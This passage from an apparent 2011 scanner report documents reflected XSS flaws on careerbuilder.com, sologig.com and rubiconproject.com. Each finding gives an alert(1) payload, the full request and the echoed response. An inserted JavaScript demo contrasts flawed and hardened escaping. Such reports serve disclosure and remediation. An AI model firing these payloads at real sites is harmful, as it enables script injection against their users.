s_cb.eVar16='natural (google) - f332d\\';alert(1)//4d1d49b1000';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.111. http://www.careerbuilder.com/JobSeeker/Jobs/JobQuery.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /JobSeeker/Jobs/JobQuery.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99c17\'%3balert(1)//a7511effd3e was submitted in the Referer HTTP header. This input was echoed as 99c17\\';alert(1)//a7511effd3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /JobSeeker/Jobs/JobQuery.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=99c17\'%3balert(1)//a7511effd3e

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 185170
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR6
Date: Sun, 04 Sep 2011 01:26:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
='Job Results';
s_cb.eVar5='JS_AS_Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', ';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 99c17\\';alert(1)//a7511effd3e';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.112. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5782b\'%3balert(1)//ac6c016cb7e was submitted in the Referer HTTP header. This input was echoed as 5782b\\';alert(1)//ac6c016cb7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5782b\'%3balert(1)//ac6c016cb7e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34386
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEARWEB54
Date: Sun, 04 Sep 2011 01:25:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
Resumes - ';
s_cb.server='www';
s_cb.channel='JS_PostResumes';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 5782b\\';alert(1)//ac6c016cb7e';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.113. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /Jobseeker/Jobs/JobResults.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19088\'%3balert(1)//259c27b2205 was submitted in the Referer HTTP header. This input was echoed as 19088\\';alert(1)//259c27b2205 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have offered ways to cause another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks themselves are escaped.

Request

GET /Jobseeker/Jobs/JobResults.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=19088\'%3balert(1)//259c27b2205

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 182684
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 04 Sep 2011 01:25:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
='Job Results';
s_cb.eVar5='JS_AS_Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', ';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 19088\\';alert(1)//259c27b2205';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.114. http://www.careerbuilder.com/PLI/R/JSToolkit.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /PLI/R/JSToolkit.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a46ea\'%3balert(1)//ccd1a479379 was submitted in the Referer HTTP header. This input was echoed as a46ea\\';alert(1)//ccd1a479379 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have offered ways to cause another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks themselves are escaped.

Request

GET /PLI/R/JSToolkit.htm HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a46ea\'%3balert(1)//ccd1a479379

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35980
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR5
Date: Sun, 04 Sep 2011 01:25:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
rver='www';
s_cb.channel='JS_Resources';
s_cb.prop1='Toolkit';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - a46ea\\';alert(1)//ccd1a479379';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.115. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /jobseeker/companies/companysearch.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac754\'%3balert(1)//bf43d41b9e1 was submitted in the Referer HTTP header. This input was echoed as ac754\\';alert(1)//bf43d41b9e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have offered ways to cause another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks themselves are escaped.

Request

GET /jobseeker/companies/companysearch.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ac754\'%3balert(1)//bf43d41b9e1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 242490
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 04 Sep 2011 01:26:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
';
s_cb.channel='JS_FindJobs';
s_cb.prop1='Search By Company';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - ac754\\';alert(1)//bf43d41b9e1';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.116. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /jobseeker/jobs/jobfindadv.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29a9c\'%3balert(1)//26924e3eff9 was submitted in the Referer HTTP header. This input was echoed as 29a9c\\';alert(1)//26924e3eff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have offered ways to cause another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks themselves are escaped.

Request

GET /jobseeker/jobs/jobfindadv.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=29a9c\'%3balert(1)//26924e3eff9

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50891
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 04 Sep 2011 01:25:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...

s_cb.channel='JS_FindJobs';
s_cb.prop1='Advanced Search - AL';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 29a9c\\';alert(1)//26924e3eff9';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.117. http://www.sologig.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sologig.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daacc\'%3balert(1)//bee404bb814 was submitted in the Referer HTTP header. This input was echoed as daacc\\';alert(1)//bee404bb814 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have offered ways to cause another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks themselves are escaped.
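The following is an added worked example, not code from the scanned sites or from the scanner. It serves all of the careerbuilder.com and sologig.com Referer findings above, which share the same quote-only escaping weakness, and equally the double-quoted string context of the rubiconproject.com ruid findings below. It emulates the server-side escaping the report describes, shows the backslash trick defeating it, and contrasts a context-correct encoder. The names s_cb and eVar16 are taken from the captured responses; the payload (with a "s_cb.pwned=1" sentinel standing in for alert(1)) is constructed for the demo.

```javascript
// Added example (not code from the scanned sites or from the scanner).
// It emulates the server-side escaping the report describes, shows the
// backslash trick defeating it, and contrasts a context-correct encoder.
// s_cb and eVar16 are the names from the captured responses; the payload
// and the s_cb.pwned sentinel are constructed for this demo.

// Flawed defence: backslash-escapes quotation marks but leaves any
// backslash already present in the input untouched.
function escapeQuotesOnly(input) {
  return input.replace(/'/g, "\\'");
}

// Context-correct encoder for data placed inside a JavaScript string
// literal: every character outside [A-Za-z0-9] becomes \uXXXX. That
// covers backslash, both quote kinds, line terminators (including
// U+2028/U+2029) and '<' and '/', so "</script>" can never appear either.
// Because the JS parser decodes the escapes, the string value is preserved.
function escapeForJsString(input) {
  return input.replace(/[^A-Za-z0-9]/g, function (ch) {
    var hex = ch.charCodeAt(0).toString(16);
    return "\\u" + ("0000" + hex).slice(-4);
  });
}

// Emulate the server: build the analytics line the way the page does,
// with the Referer-derived value dropped into a single-quoted string.
function renderAnalyticsLine(escaper, refererValue) {
  return "s_cb.eVar16='natural (google) - " + escaper(refererValue) + "';";
}

// Execute the rendered line as a <script> block would. new Function gives
// a fresh scope; s_cb is passed in so the result can be inspected.
function executeRendered(line) {
  var s_cb = {};
  new Function("s_cb", line)(s_cb);
  return { value: s_cb.eVar16, injected: s_cb.pwned === 1 };
}

// Constructed payload in the report's shape, with "s_cb.pwned=1" standing
// in for alert(1). The backslash before the quote is what defeats the
// quote-only escaper: it becomes \\' and the quote closes the string.
var PAYLOAD = "5782b\\';s_cb.pwned=1//ac6c016cb7e";

function demo() {
  return {
    flawed: executeRendered(renderAnalyticsLine(escapeQuotesOnly, PAYLOAD)),
    fixed: executeRendered(renderAnalyticsLine(escapeForJsString, PAYLOAD))
  };
}

var result = demo();
console.log(renderAnalyticsLine(escapeQuotesOnly, PAYLOAD));
console.log("flawed escaper, injected code ran:", result.flawed.injected);   // true
console.log("hardened escaper, injected code ran:", result.fixed.injected);  // false
console.log("hardened value intact:",
  result.fixed.value === "natural (google) - " + PAYLOAD);                   // true
```

The allow-list encoder is preferable to patching the quote-only escaper, because it does not depend on the order in which individual characters are handled and it also closes the "</script>" and line-terminator breakouts that a backslash-and-quote fix alone leaves open.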

Request

GET / HTTP/1.1
Host: www.sologig.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=daacc\'%3balert(1)//bee404bb814

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27472
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL8
Date: Sun, 04 Sep 2011 01:27:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
me - ';
s_cb.server='www.sologig.com';
s_cb.channel='js_home';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - daacc\\';alert(1)//bee404bb814';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.118. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 339a4"><script>alert(1)</script>b294b1824ff was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=339a4"><script>alert(1)</script>b294b1824ff; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4462/5032; rdk15=0; ses15=5032^1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:24 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:24 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:45:24 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^28&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112475; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3152805.js^1^1315097124^1315097124&224353.js^1^1315097124^1315097124&3220233.js^1^1315097119^1315097119&3222405.js^2^1315097118^1315097119&3164882.js^1^1315097118^1315097118&3214995.js^4^1315096957^1315097118; expires=Sun, 11-Sep-2011 00:45:24 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1325

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=339a4"><script>alert(1)</script>b294b1824ff" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

5.119. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6291/9346/15214-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a1a"-alert(1)-"9813aded66a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6291/9346/15214-15.js?cb=0.6276808138936758&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=18a1a"-alert(1)-"9813aded66a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; rdk=6291/9346; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%265364%3D1%267751%3D1; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:10 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:05:10 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 02:05:10 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^1630e6e4816a1fe505c6d800e&9346^58; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111289; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2014

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3150791"
...[SNIP]...
